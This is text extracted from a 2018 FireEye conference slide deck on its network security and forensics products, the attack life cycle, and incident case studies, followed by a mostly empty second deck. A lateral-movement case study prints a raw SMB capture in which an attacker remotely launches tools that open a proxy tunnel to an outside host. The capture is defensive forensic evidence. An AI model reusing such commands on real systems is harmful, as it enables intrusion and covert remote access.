Upload
others
View
15
Download
0
Embed Size (px)
Citation preview
Defending Against Evolving Network Security Threats
©2018 FireEye
Network Security Today
Sophisticated
Hiding in plain sightCredential reuse Rapid evasion creation
Persistent
TargetedInnovativeCustomized
Professional
DeterminedOrganizedWell Funded
2
101 DaysAverage days before a breach was detected*
$3.62MAverage cost of a
breach**
©2018 FireEye
Lack of resources to quickly and effectively
address threats
Lack of visibility into traffic as networks
expand
Driving the need to reduce dwell time and limit exposure
3
Compounding FactorsThreat Actors aren’t the Only Challenge
©2018 FireEye
New Developments in Network Security
4
Network Security (NX 6500) & Smart Grid (VX 12550)
File & Content Security (FX 6500)
Network Forensics (PX/IA)
SmartVision
©2018 FireEye
DC DMZ
Router
NG Firewall
Switch
Engineering HR Marketing
PrivatePublic
Web DNS App EmailFile File File App
File ContentSecurity (FX)
SmartVision
Email Security
Endpoint Security
MobileCentral Management IA
PX
Endpoint Security
Network Security Topology
Network Security (NX)
vNX
©2018 FireEye
New Developments in Network Security (NX & FX)“Five Styles of Advanced Threat Defense Framework”
6
PayloadAnalysis
§ Style 3 – Payload Analysis (aka Sandboxing)
– NX/FX
§ Style 2 – Network Forensics
– PX/IA
§ Style 1 – Network Traffic Analysis (NTA)
– SmartVision
©2018 FireEye
Network Security 5th Generation Portfolio
!
NX 6500
!
NX 5500
NX 4500
NX 4400
NX 3500
NX 2500
PWR
NX 1500
NX 2550 !
VX 12550
VX 5500 MVX Smart Grid
Cloud MVXGREATER STORAGEWith 2x storage to hold more metadata and alerts
GREATER VALUENew 5th generation appliance set a new standard for price/performance, SSL Intercept
GREATER PORT DENSITYTwice the port density provides greater flexibility and scalability as networks grow
NEW10Gbps
ADVANCED DETECTIONML modules for Exfil detection, SSL beaconing and fingerprinting, MalwareGuard analysis
©2018 FireEye
Malware that Targets Files and Content
Data Center
• Detect and block malware in file shares and content stores
• Detects advanced malware that bypasses AV
• Optimized for SharePoint and OneDrive
Infected File
End Users File Share/Data Store
File Protect FX 6500
©2018 FireEye
New Developments in Network Forensics
9
“Five Styles of Advanced Threat Defense Framework”
§ Style 3 – Payload Analysis (aka Sandboxing)
– NX/FX
§ Style 2 – Network Forensics
– PX/IA
§ Style 1 – Network Traffic Analysis (NTA)
– SmartVision
NetworkForensics
©2018 FireEye
FireEye Network Forensics – A Complete Solution
10
◆ Packet capture (PX) – a “security camera” to record and replay network traffic and flows
▶ What happened?
▶ What was involved?
▶ What was taken?
◆ Investigation Analysis (IA) – a source to manage multiple “security cameras”
◆ A tool that correlates events and asks questions:
“How many times in the last three months did this guy….. with the red hat and the dark beard….. appear on any of our cameras….. while carrying a brown briefcase?”
©2018 FireEye
11
Detect a broad array of security incidents, improve the quality of your response and precisely quantify the impact of each incident
High-PerformancePacket Capture
That Grows withYour Network
High-Fidelity Data Analysis
THREAT HUNTINGPerform retrospective threat hunting and analysis
EXTENSIVE VISIBILITYSession decoder support for a myriad of protocols & file types
FLEXIBLE PLATFORMScales to meet distributed and large enterprise needs;Subscription pricing and expandable storage licenses
HIGH-PERFORMANCERecord speeds of up to 20Gbps
LOSSLESS PACKET CAPTUREVital to effective network forensic investigations
INTELLIGENT CAPTURESelective packet filtering for maximum efficiency
ULTRAFAST SEARCHLeverage unique indexing architecture for fast answers
EASY DRILL DOWN Quickly respond to alerts that matter
INTEGRATED INTELAdd rich context to IOC and alerts
©2018 FireEye
New Developments – SmartVision “Five Styles of Advanced Threat Defense Framework”
12
NetworkTraffic Analysis
§ Style 3 – Payload Analysis (aka Sandboxing)
– NX/FX
§ Style 2 – Network Forensics
– PX/IA
§ Style 1 – Network Traffic Analysis (NTA)
– SmartVision
©2018 FireEye
Anatomy of the Attack Life Cycle
Initial Recon
Establish Foothold
Escalate Privileges
Complete Mission
Initial Compromise
Internal Recon
Maintain Presence
Move Laterally
Maintain Presence
Use of persistence mechanisms, such as Volume Boot Record (VBR) modification
File and objects moved over Windows SMB protocols
Unusual file transfer activity from ADMIN
Network mappingHost & Service EnumerationUser Hunting
Installation of fileless malwaresuch as Mimikatz
Malware Download C&C
SmartVision – Demonstration
©2018 FireEye
Why SmartVision
17
◆ Born from real-world investigation monitoring◆ Attackers consistently find ways around existing security controls◆ Once inside, attackers must leverage existing environment to access systems◆ Lack of investment by attackers in novel lateral movement◆ Well-defined protocols used differently by attackers and administrators
©2018 FireEye
Data Center
Router
Firewall
Switch
Engineering HR Marketing
File App Email
Remote Office
Enterprise Network Architecture with SmartVision
SmartVisionDNS
NX
SmartVision SmartVision
SmartVision
PCI Network SCADA Network
SmartVision
©2018 FireEye
SmartVision Internals
19
◆ Monitor internals protocols for base events:▶ SMB, SMB2, DCERPC, WinRM◆ Record protocol metadata for triage review:▶ DNS, HTTP, TLS, RTSP, SIP, SSH, SMTP, POP3, RDP, SMB, SMB2, DCERPC, IRC◆ Correlate individual, “base” events as they occur◆ Some “base” events are definitively evil◆ Other “base” events require correlation
©2018 FireEye
SmartVision Example Correlation
20
◆ Remote Service Created and Started
ROpenSCManagerWCreateServiceW
RStartServiceW
RCreateServiceWOW64WOR
RDeleteService
Optionally
©2018 FireEye
Case Study 1: Credential Dumping
21
◆ Mandiant responds to an Incident Response◆ Active attacker targeting a consulting firm◆ Attacker is attempting to access data concerning consulting firm’s clients◆ Mandiant deploys SmartVision sensors to critical network segments
©2018 FireEye
Case Study 1: Credential Dumping
22
©2018 FireEye
Case Study 1: Credential Dumping
23
◆ Base events are visible for each high-level alert◆ Base events contain their own metadata, which is available for analysis
©2018 FireEye
Case Study 1: Credential Dumping
24
©2018 FireEye
Case Study 1: Credential Dumping
25
©2018 FireEye
Case Study 1: Credential Dumping
26
©2018 FireEye
Case Study 1: Credential Dumping
27
©2018 FireEye
Case Study 2: Lateral Movement
28
◆ IT provider. Initial intrusion happened before start of “Proof-of-Concept”◆ Attacker using VPN to access the environment. No backdoors.◆ SmartVision recorded lateral movement and remote command execution on systems
©2018 FireEye
Case Study 2: Lateral Movement
29
◆ IT provider. Initial intrusion happened before start of “Proof-of-Concept”◆ Attacker using VPN to access the environment. No backdoors.◆ SmartVision recorded lateral movement and remote command execution on systems
PIPE\??\\AD-SERVER-IP-REDACTED cmd /c "start c:\windows\temp\sk.exe -proxy CHINESE-IP-REDACTED 443 8099")?SMB? ??0?,?????#?SMBq? ??0?,Z?SMBu???0-?/\\ AD-SERVER-IP -REDACTED\IPC$?????b?SMB?? \0@-????0mt???,?l?@E;?SMB.? ??0?-????????>?SMB%? \0.?T?T&??\PIPE\??\\ AD-SERVER-IP-REDACTED??CCcmd /c "start c:\windows\temp\p.exe -s 8087 -dir c:\win
©2018 FireEye
Case Study 2: Lateral Movement
30
©2018 FireEye
Case Study 3: Reconnaissance + Remote Execution
31
◆ Car Manufacturer◆ BADRABBIT ransomware deployed to select systems◆ Reconnaissance activity on servers during ransomware attack
©2018 FireEye
Case Study 3: Reconnaissance + Remote Execution
32
©2018 FireEye
Case Study 3: Reconnaissance + Remote Execution
33
©2018 FireEye
Case Study 3: Reconnaissance + Remote Execution
34
©2018 FireEye
SmartVision Roadmap
35
◆ More correlation rules◆ More protocols supported◆ Unsupervised Machine Learning◆ User-interface improvements for quick
alert triage
Thank You
OCTOBER 1 – 4, 2018 | WASHINGTON, D.C.
Practical ExperienceBest Practice GuidanceBrian Barnett, CEO Luz Technologies
Who We Are?
•••
Common Challenges to Our Methods
••••
Things We’ve Actually Heard
Things We’ve Actually Heard
The Importance of Perimeter Complexity
What We Look For
How We Leverage NX Technology
Best Practice Guidance
The Inside Threat••••
Eggs In One Basket••
•••
Kinetic vs Persistent
•••
•••
OCTOBER 1 – 4, 2018 | WASHINGTON, D.C.
Thank YouBrian Barnett, CEO Luz Technologies